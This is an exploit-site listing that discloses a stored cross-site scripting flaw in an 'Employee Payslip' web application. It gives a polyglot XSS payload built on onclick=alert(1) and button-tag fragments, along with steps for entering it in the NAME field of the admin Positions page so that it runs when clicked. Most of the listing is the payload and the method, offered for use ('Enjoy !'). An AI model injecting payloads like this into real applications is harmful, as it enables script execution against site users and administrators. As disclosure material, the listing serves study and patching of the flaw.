Edit Report

Our sensors found this exploit at:

Below is a copy:

Employee Payslip - XSS Polyglots
# Title: Employee Payslip - XSS Polyglots
# Author: @Eawhitehat - Eren Arslan
# Demo available :
# CVE: N/A
# Screenshot :

Used Payload :
 onclick=alert(1)//<button  onclick=alert(1)//> */ alert(1)//

Admin account : 

Method :
Connect to panel with admin acc : http://.../admin/

1. After login with SUPER ADMIN, go to http://.../admin/?page=positions (Position List page)
2. "Create New" and add in "NAME" the payload :  onclick=alert(1)//<button  onclick=alert(1)//> */ alert(1)//
3. After New Position created, click in the form for exec your payload XSS Polyglots

Enjoy !

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.